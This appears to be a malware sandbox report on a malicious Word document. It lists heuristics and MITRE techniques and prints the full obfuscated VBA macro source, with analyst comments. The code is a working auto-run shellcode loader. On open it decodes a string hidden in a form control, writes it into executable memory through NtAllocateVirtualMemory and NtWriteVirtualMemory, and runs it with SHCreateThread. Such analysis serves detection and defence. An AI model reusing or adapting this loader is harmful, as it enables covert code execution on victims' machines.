MALICIOUS
90
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros, as indicated by the 'OLE_VBA_MACROS' and 'ClamAV: Doc.Dropper.ZwMacros-6057750-0' heuristics. The 'Document_Open' macro is present, suggesting it executes upon opening. The VBA code appears to be obfuscated but likely attempts to download and execute a second-stage payload, a common dropper behavior. Note that the extracted macro source also declares aliases for NtAllocateVirtualMemory, NtWriteVirtualMemory and SHCreateThread and decodes a string held in a form control, which points to in-process execution of an embedded payload rather than (or in addition to) a download.
Heuristics 4
-
ClamAV: Doc.Dropper.ZwMacros-6057750-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.ZwMacros-6057750-0
-
VBA macros detected — medium — 1 related finding — OLE_VBA_MACROS: Document contains VBA macro code
-
Document_Open macro — low — OLE_VBA_DOCOPEN: Document_Open macro. Matched lines in script:
Attribute VB_Customizable = True / Private Sub Document_Open() / Dim gogo As Long
-
Embedded URL info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. The URLs below are XMP/RDF schema namespace identifiers found in embedded metadata, not endpoints the document contacts. URL http://ns.adobe.com/xap/1.0/ — In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns# — In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/ — In document text (OLE body)
- http://purl.org/dc/elements/1.1/ — In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/ — In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent# — In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef# — In document text (OLE body)
- http://ns.adobe.com/camera-raw-settings/1.0/ — In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13601 bytes |
SHA-256: 73566d4bbedc5059986a8fff224ebf427a45e1d036e33f07c92b76e62409a226
Preview script — First 1,000 lines of the extracted script
' Module header for the ThisDocument module as emitted by olevba. These are
' standard VBA module attributes; the auto-exec entry point follows below.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-exec entry point: Word runs Document_Open when the document is opened
' (the OLE_VBA_DOCOPEN heuristic above). The only statement that matters is
' the call to tyrannize; the Dims, string assignments and the SLN call are
' filler whose results are never read.
Private Sub Document_Open()
Dim gogo As Long
Dim dotterel As Long
perissology = "consistory"
piscidia = "orchestrator"
' Hand off to the loader routine defined later in this module.
tyrannize
' SLN (straight-line depreciation) — decoy arithmetic, result unused.
homogyne = 21
electrocute = 36089
selenipedium = 385492
saprogenous = SLN(selenipedium, electrocute, homogyne)
End Sub
' Thin wrapper over "moored", the NtWriteVirtualMemory alias declared in the
' fruitage module. By position: innately = destination address,
' arctocephalus = source buffer address, contemper = byte count. The function
' never assigns its return value; the Dim block, the string assignments and
' the Fix/SLN arithmetic are filler.
Function admissive(innately, arctocephalus, contemper)
#If Win64 Then
Dim analogical As Byte
Dim collectible As Long
Dim perishable As LongPtr
Dim eclaircissement As LongPtr
Dim chromosphere As LongPtr
Dim erato As Variant
Dim disjunct As LongPtr
Dim ast As LongPtr
#Else
Dim eclaircissement As Long
Dim savannah As String
Dim perishable As Long
Dim stonecress As String
Dim disjunct As Long
Dim bedgown As Variant
Dim chromosphere As Long
Dim lorgnette As Variant
Dim ast As Long
Dim affricate As Variant
Dim cocheleate As String
#End If
misproportion = "facundity"
bloodlessly = Fix(191.4983 + 242)
' Copy the three arguments into typed locals before the API call.
eclaircissement = innately
ast = contemper
ghyll = misproportion
disjunct = arctocephalus
bittercress = 46
unended = 13249
obnubilated = 365686
scowling = SLN(obnubilated, unended, bittercress)
misproportion = "hosannah"
' 5 + 40 + 45 - 91 = -1, passed as the process-handle argument
' (presumably the current-process pseudo-handle — confirm).
perishable = 5 + 40 + 45 - 91
' Argument order matches NtWriteVirtualMemory(handle, base, buffer, size,
' bytes-written); chromosphere is an uninitialised local (0) in the last slot.
moored ByVal perishable, eclaircissement, disjunct, ast, chromosphere
bloodlessly = Fix(125.5467 + 481)
End Function
' Decoy: looks like a Word object-model documentation sample (maximise a
' minimised window of "Example.doc"). No visible caller anywhere in the
' extracted source.
Sub max()
With Documents("Example.doc").Windows(1)
If .WindowState = wdWindowStateMinimize Then _
.WindowState = wdWindowStateMaximize
End With
End Sub
' Allocates a new memory region in the current process via "angelically"
' (NtAllocateVirtualMemory alias) and copies the decoded payload held in the
' Variant argument onehalf into it via admissive. Returns the region's base
' address (avionics). Everything else in the body is filler.
Function broadcasting(onehalf)
Dim musket As String
Dim megaphone As Integer
Dim microstomus As Byte
Dim lexicography As Integer
#If Win64 Then
Dim beninese As Integer
Dim barn As LongPtr
' involved = pointer size for this build (8 on Win64, 4 on Win32).
involved = 8
Dim sexy As Integer
Dim avionics As LongPtr
Dim houston As Integer
Dim clavated As LongPtr
Dim plastered As Variant
#Else
Dim dejected As String
Dim barn As Long
involved = 4
Dim avionics As Long
Dim capitalization As Long
Dim clavated As Long
Dim understudy As Byte
Dim amitosis As Variant
#End If
' Copies one pointer-size value from offset 8 of the Variant onehalf into
' barn, i.e. reads the Variant's data pointer (assumes the data field sits at
' +8 — confirm). barn then points at the decoded payload bytes.
cloudtouching = admissive(VarPtr(barn), VarPtr(onehalf) + 8, involved)
' Arguments for NtAllocateVirtualMemory(handle, *base, zerobits, *size,
' type, protect): handle -1, base out-param avionics (0 = let the kernel
' choose), zerobits 0, size 9728, type 4096, protect 64. 4096 and 64 match the
' documented values of MEM_COMMIT and PAGE_EXECUTE_READWRITE — confirm.
bearing = -1
avionics = 0
planner = 28 - 28
clavated = 9728
purulence = 36 + 65 - 33 + 4028
mensal = 95 - 100 + 69
besmear = angelically(ByVal bearing, avionics, ByVal planner, clavated, ByVal purulence, ByVal mensal)
' No-op / junk statements.
ghyll = ghyll
incoherence = incoherence / 70
' Write 64 - 32 + 4352 = 4384 bytes from barn into the new region.
admissive avionics, barn, 64 - 32 + 4352
graveolent = 37
hydrometer = 20330
commendat = 269159
overbid = SLN(commendat, hydrometer, graveolent)
' Return the base address of the written region.
broadcasting = avionics
End Function
' Loader routine called from Document_Open. Sequence that matters:
'   1. read a string from the blush.mezzosoprano form control (SelectedItem.Name)
'      and keep its last 5844 characters;
'   2. decode it with fruitage.miasm;
'   3. allocate + write it into process memory with broadcasting;
'   4. start a thread at base + offset via "reflect" (SHCreateThread alias).
' The Pmt/SLN calls, string assignments and most Dims are filler.
Sub tyrannize()
Dim butt As Integer
Dim icosahedron As String
' Writes page count + 9 into the control's Value; purpose unclear from here.
overreckon = ThisDocument.ComputeStatistics(wdStatisticPages)
blush.mezzosoprano.Value = overreckon + 9
gorgeousness = "fut" & "uriti" & "on"
haiti = "appropriate"
conditionality = "connoisseur"
' The encoded payload is stored in a form-control item name, not in the
' macro source — relevant for detection: olevba-style string extraction
' alone will not show it.
Set noninflammatory = blush.mezzosoprano.SelectedItem
speeding = 30
cafuzo = 18427
boringness = 563288
statuelike = SLN(boringness, cafuzo, speeding)
dphil = noninflammatory.Name
' 10 - 70 - 36 + 5940 = 5844 characters taken from the right.
astraea = 10 - 70 - 36 + 5940
disscit = Right(dphil, astraea)
' Decode (see miasm in the fruitage module).
adore = fruitage.miasm(disscit)
selfabasement = 78
aitch = 33001
ketembilla = 325861
aitch = Pmt(0.0467, selfabasement, -15062, ketembilla, 0)
beyond = "fulsome"
#If Win64 Then
Dim collectedly As Long
Dim accent As LongPtr
Dim cetraria As LongPtr
Dim hymen As String
#Else
Dim dactylonomy As String
Dim cetraria As Long
Dim exponentially As Byte
Dim accent As Long
#End If
paradox = 0
scorify = "chrom" & "oblastom" & "ycosis"
clashing = 4096
commemorative = 41
acrocarpous = 39217
affranchise = 293146
give = SLN(affranchise, acrocarpous, commemorative)
cephalochordata = "di" & "sco"
lolo = "uppercut"
picketing = "dearth"
microbe = 27
sprit = 16196
reechy = 318826
gallinaceous = SLN(reechy, sprit, microbe)
telegrapher = adore
dissatisfied = "excogitate"
' accent = base address of the allocated region holding the decoded bytes.
accent = broadcasting(telegrapher)
mix = "monospermous"
' Entry offset into the region: 13 - 62 - 122 + 1483 = 1312 on Win64,
' (4 - 1 + 5 + 487) + 2659 = 3154 on Win32.
#If Win64 Then
Dim doux As Variant
Dim interspersion As LongPtr
intromit = "electrometer"
canticle = "igigi"
Dim lawfulness As LongPtr
acharnement = 13 - 62 - 122 + 1483
#ElseIf Win32 Then
diestock = "ar" & "tists"
unimaginative = "cavaliere"
Dim interspersion As Long
trifle = 4 - 1 + 5 + 487
Dim lawfulness As Long
acharnement = trifle + 2659
#End If
Dim biotite As Variant
Dim toy As Variant
interspersion = 0
cetraria = accent + acharnement
lawfulness = 1
' Execute: thread start address = base + offset; remaining args 0, 1, 0.
byssus = reflect(cetraria, interspersion, lawfulness, interspersion)
am = 38
birdcage = 31305
crystallized = 256586
mea = SLN(crystallized, birdcage, am)
End Sub
Attribute VB_Name = "fruitage"
' Standard module holding the API imports used by the loader; the song-lyric
' comments are padding. Alias -> real export, as declared below:
'   moored      -> Ntdll.dll   NtWriteVirtualMemory      (used by admissive)
'   angelically -> ntdll.dll   NtAllocateVirtualMemory   (used by broadcasting)
'   reflect     -> Shlwapi.dll SHCreateThread            (used by tyrannize)
'   dayspring/salient, hardened/intraspecies, sensual/drown,
'   dodderer/preservative, cirripedia/epidendron -> Shell32/Kernel32 exports
'   (SHGetSettings, SHChangeNotification_Lock, LocalFree, SHGetDesktopFolder,
'   ReadConsoleW) with no visible caller — likely decoys.
' Win64 and Win32 branches declare the same set under different random names.
' You search for me
' You search for me
' You surprise me with
#If Win64 Then
' You surprise me with just how perfect you are
' You search for me
' I'm suppose to be
' Decoy import (no visible caller).
Public Declare PtrSafe Function dayspring Lib "Shell32.dll" Alias "SHGetSettings" (dover As LongPtr,moldiness As LongPtr) As LongPtr
' I'm suppose to be
' There's no doubt that this will make me strong
' Despite this cruel world
' Decoy import (no visible caller).
Public Declare PtrSafe Function hardened Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (inquiring As LongPtr, corps As Any,ghostwriter As LongPtr, garmentmaker As Any) As Boolean
' And when I doubt
' I never want to wake you up
' Even with all my flaws
' Used: writes the decoded payload into the allocated region (see admissive).
Public Declare PtrSafe Function moored Lib "Ntdll.dll" Alias "NtWriteVirtualMemory" (ByVal slouching As Any, ByVal interweave As Any, ByVal depopulate As Any, ByVal allknowing As Any, ByVal westerly As Any) As LongPtr
' Out in the world that's beyond my control
' You always seem
' I never want to wake you up
' Used: starts a thread at the written region (see tyrannize).
Public Declare PtrSafe Function reflect Lib "Shlwapi.dll" Alias "SHCreateThread" (ByVal anshar As LongPtr, ByVal glower As Any, ByVal allophone As LongPtr, ByVal kike As LongPtr) As LongPtr
' Despite this cruel world
' Because it's the hardest thing I've ever done
'
' Decoy import (no visible caller).
Public Declare PtrSafe Function sensual Lib "Kernel32.dll" Alias "LocalFree" (boycott As LongPtr) As LongPtr
' There's no doubt that this will make me strong
' Because it's the hardest thing I've ever done
' The stronger one
' Used: allocates the region (see broadcasting). Note "zoarcesByVal" is a
' parameter NAME (missing space), so the 4th argument is passed ByRef — a
' generator artefact worth fingerprinting.
Public Declare PtrSafe Function angelically Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (accountable As LongPtr, semiopacous As LongPtr, ByVal badtempered As LongPtr,zoarcesByVal As LongPtr, gittern As LongPtr, ByVal degage As LongPtr) As LongPtr
' You remind me of just how perfect you are
' Just how perfect you are
' And when I'm lost
' Decoy import (no visible caller).
Public Declare PtrSafe Function dodderer Lib "Shell32.dll" Alias "SHGetDesktopFolder" (fictional As LongPtr)
' And when I doubt
' And when I doubt
' Just how perfect you are
' Decoy import (no visible caller).
Public Declare PtrSafe Function cirripedia Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal emerald As LongPtr,enslavement As LongPtr,hurst As LongPtr,average As LongPtr,cosmopolitan As LongPtr) As Boolean
' You remind me of just how perfect you are
' Just how perfect you are
' To prove that theory wrong
'
' You're my belief
' You surprise me with
#Else
' And when I'm lost
' You surprise me with
' Just how perfect you are
' Decoy import (no visible caller).
Public Declare Function preservative Lib "Shell32.dll" Alias "SHGetDesktopFolder" (sedulous As Long)
' I'm suppose to be
' To prove that theory wrong
' There's no doubt that this will make me strong
' Decoy import (no visible caller).
Public Declare Function epidendron Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal achromatism As Long, layia As Long, unsaturated As Long, fanion As Long, brigandine As Long) As Boolean
' You surprise me with
' You're my belief
' There's no doubt that this will make me strong
' Decoy import (no visible caller).
Public Declare Function intraspecies Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (absently As Long, anodonta As Any, euphractus As Long, catapult As Any) As Boolean
' Just how perfect you are
' You surprise me with
' Even with all my flaws
' Used: 32-bit twin of the NtWriteVirtualMemory import above.
Public Declare Function moored Lib "Ntdll.dll" Alias "NtWriteVirtualMemory" (ByVal lionhearted As Any, ByVal bizarre As Any, ByVal armchair As Any, ByVal forcing As Any, ByVal aerobacter As Any) As Long
' Even with all my flaws
' Even with all my flaws
' п»їSometimes I doubt the path I chose
' Used: 32-bit twin of the SHCreateThread import above.
Public Declare Function reflect Lib "Shlwapi.dll" Alias "SHCreateThread" (ByVal misemploy As Long, ByVal furl As Any, ByVal unregistered As Any, ByVal drape As Any) As Long
' Despite this cruel world
' I never want to wake you up
' Despite this cruel world
' Decoy import (no visible caller).
Public Declare Function drown Lib "Kernel32.dll" Alias "LocalFree" (churning As Long) As Long
' You remind me of just how perfect you are
' Full of cynicism
' Just how perfect you are
' Decoy import (no visible caller).
Public Declare Function salient Lib "Shell32.dll" Alias "SHGetSettings" (mojave As Long, chance As Long) As Long
'
' And all my best efforts
' Full of cynicism
' Used: 32-bit twin of the NtAllocateVirtualMemory import; same
' "intentionByVal" parameter-name artefact as the 64-bit declaration.
Public Declare Function angelically Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (irongray As Long, cauda As Long, ByVal mismatch As Long, intentionByVal As Long, cosignatory As Long, ByVal archegenesis As Long) As Long
' Despite this cruel world
' Despite this cruel world
' When I'm at my wit's end
' I never want to wake you up
' I never want to wake you up
' The stronger one
#End If
' Just how perfect you are
' You always seem
' And when I'm lost
' Decoy: Forms / Form look like the Access object model rather than Word, so
' this reads as a documentation sample pasted in as padding. No visible caller.
Sub IterateOpenForms()
Dim frm As Form
For Each frm In Forms
'Print the name of the referenced form to the Immediate window
Debug.Print frm.Name
Next frm
End Sub
' Decoder for the payload string read from the form control (see tyrannize).
' Two stages:
'   1. each input character is shifted back into the base64 alphabet
'      (+16 on even positions, +15 on odd ones; convenance = Log(100)/Log(10)
'      + 14, i.e. 16 up to floating-point noise);
'   2. a standard 4-characters-to-3-bytes base64 decode using the audiometer
'      lookup table, with the shifts and masks routed through saffron.
' The input is assumed to be exactly 5844 characters (indices 0..unerringly);
' the result is the coverage byte array returned as a binary string. The
' Pmt/SLN/Round calls and most Dims are filler.
Function miasm(catatonic) As String
Dim censoring As Byte
Dim guncotton As Long
' Output buffer (6966 bytes) — larger than the 4383 bytes 5844 chars produce.
Dim coverage(6965) As Byte
Dim catalogued As String
Dim authorize As Long
hangover = "pericarp"
Dim aoudad As Integer
Dim buttery As Long
Dim scrounge() As Byte
ghyll = hangover
Dim stickiness As String
Dim shopkeeper As Long
' Per-position multiplier tables: value << 12, << 6 and << 18 respectively.
Dim frostbound(63) As Long
misproportion = ghyll
Dim cogitation As String
Dim deplore(63) As Long
Dim geophysics(63) As Long
' 25 + 67 + 4004 = 4096 (1 << 12)
unbeseeming = 25 + 67 + 4004
outstep = 16515072
gobbledygook = 256
Dim onside As Variant
Dim ectstasies As Variant
semibreve = 66 - 3
Dim possible As Integer
' Masks for the three output bytes: 0xFF00, 0xFF0000 (cloy), 0xFF.
austereness = 65280
boykinia = 105 + 114 + 52 + 3761
' 117 + 65419 = 65536 (1 << 16)
quarrelsome = 117 + 65419
draconian = 64
hominidae = 258048
' 262144 = 1 << 18
forefathers = 262144
' 48 + 11 - 117 + 16711738 = 16711680 = 0xFF0000
cloy = 48 + 11 - 117 + 16711738
fractiously = 255
Dim waggishly As Variant
dromedary = 0
' Implicit variable; never read.
Caption = 5843
Dim remark() As Byte
' Narrow the input string to one byte per character.
remark = VBA.StrConv(catatonic, vbFromUnicode)
Dim lekvar As Variant
garnish = 74
airspace = 31132
poetize = 532557
airspace = Pmt(0.0707, garnish, -23975, poetize, 0)
' Last valid index of the 5844-character input.
unerringly = 5843
emissary = 114 + 84 - 163
' Log(100)/Log(10) + 14 = 16.
convenance = Log(100) / Log(10) + 14
' Stage 1: undo the per-position shift (even index +16, odd index +15).
For gerea = 0 To unerringly
If gerea Mod 2 = 0 Then
remark(gerea) = remark(gerea) + convenance
Else
remark(gerea) = remark(gerea) + convenance - 1
End If
Next gerea
elopidae = 28
jordanella = 31036
eschar = 339853
packinghouse = SLN(eschar, jordanella, elopidae)
aoudad = 0
failed = 0
gum = 43
' ASCII -> base64 digit table (see audiometer).
argonaut = audiometer
' Precompute digit * 64, digit * 4096, digit * 262144 for the four positions.
For guncotton = 0 To 63
deplore(guncotton) = saffron(guncotton, draconian, 3)
frostbound(guncotton) = saffron(guncotton, unbeseeming, 3)
geophysics(guncotton) = saffron(guncotton, forefathers, 3)
Next guncotton
yodh = 42
libation = 32829
vicinage = 365900
bleaching = SLN(vicinage, libation, yodh)
scrounge = remark
nerita = 4
cheilitis = 19
frailty = 36346
indium = 236459
frailty = Pmt(0.0692, cheilitis, -6148, indium, 0)
' doorframe = 3, mention = 2: offsets used in the decode loop below.
doorframe = 125 - 122
ghyll = "duelist"
incoherence = VBA.Math.Round(120.6239 + 179)
overofficious = doorframe + 1
mention = 2
' Stage 2: four input digits -> one 24-bit value -> three output bytes.
' shopkeeper advances by 3 inside the body plus 1 from Next, i.e. step 4.
For shopkeeper = 0 To unerringly
banners = scrounge(shopkeeper)
spherule = scrounge(shopkeeper + 2)
authorize = geophysics(argonaut(banners)) _
+ frostbound(argonaut(scrounge(shopkeeper + 1))) + deplore(argonaut(spherule)) + argonaut(scrounge(shopkeeper + doorframe))
' byte 0 = (value And 0xFF0000) \ 0x10000
guncotton = saffron(authorize, cloy, 2)
coverage(buttery) = saffron(guncotton, quarrelsome, 1)
' byte 1 = (value And 0xFF00) \ 0x100
guncotton = saffron(authorize, austereness, 2)
coverage(buttery + 1) = saffron(guncotton, gobbledygook, 1)
' byte 2 = value And 0xFF
coverage(buttery + mention) = saffron(authorize, fractiously, 2)
buttery = buttery + mention + 1
shopkeeper = shopkeeper + 3
Next
' Byte array assigned to a String return: the bytes are returned verbatim.
miasm = coverage
End Function
' Wrapper around AscW (Unicode code of the first character). No visible caller.
Function ignavus(clammily)
ignavus = AscW(clammily)
End Function
' Three-way arithmetic dispatch used by miasm to hide bit operations behind a
' mode argument: 1 = integer division (a right shift when the divisor is a
' power of two), 2 = bitwise And (mask), 3 = multiplication (a left shift when
' the multiplier is a power of two). Any other mode returns Empty.
Function saffron(suspension, canaliculate, zincography)
Select Case zincography
Case 1
saffron = suspension \ canaliculate
Case 2
saffron = suspension And canaliculate
Case 3
saffron = suspension * canaliculate
End Select
End Function
' Builds a 256-entry lookup table mapping an ASCII code to its base64 digit
' value: 'A'..'Z' -> 0..25, '0'..'9' -> 52..61, 'a'..'z' -> 26..51,
' '/' -> 63, '+' -> 62 — the standard base64 alphabet. Other entries stay 0.
Function audiometer()
Dim blankness(255) As Byte
' 65..90 ('A'..'Z') -> 0..25
sulfamethazine = 65
Do
blankness(sulfamethazine) = sulfamethazine - 65
sulfamethazine = sulfamethazine + 1
Loop Until sulfamethazine = 91
' 48..57 ('0'..'9') -> 52..61
sulfamethazine = 48
Do
blankness(sulfamethazine) = sulfamethazine + 4
sulfamethazine = sulfamethazine + 1
Loop Until sulfamethazine = 58
' 97..122 ('a'..'z') -> 26..51
sulfamethazine = 97
Do
blankness(sulfamethazine) = sulfamethazine - 71
sulfamethazine = sulfamethazine + 1
Loop Until sulfamethazine = 123
' '/' (47) -> 63 and '+' (43) -> 62
blankness(47) = 63
sulfamethazine = 43
blankness(sulfamethazine) = 62
audiometer = blankness
End Function
Attribute VB_Name = "blush"
' Module header for "blush", the object referenced as blush.mezzosoprano by
' tyrannize. The VB_Base value with two GUIDs is the shape olevba prints for a
' designer (UserForm) module — the control definitions themselves are not part
' of the extracted text. The encoded payload is therefore held in a form
' control item name, not in the macro source, which matters when choosing
' what to extract for detection.
Attribute VB_Base = "0{C8A04F59-31F4-472A-B098-9C646B541E7C}{5527B7F7-79B2-492C-840A-AC1EF3D9D879}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||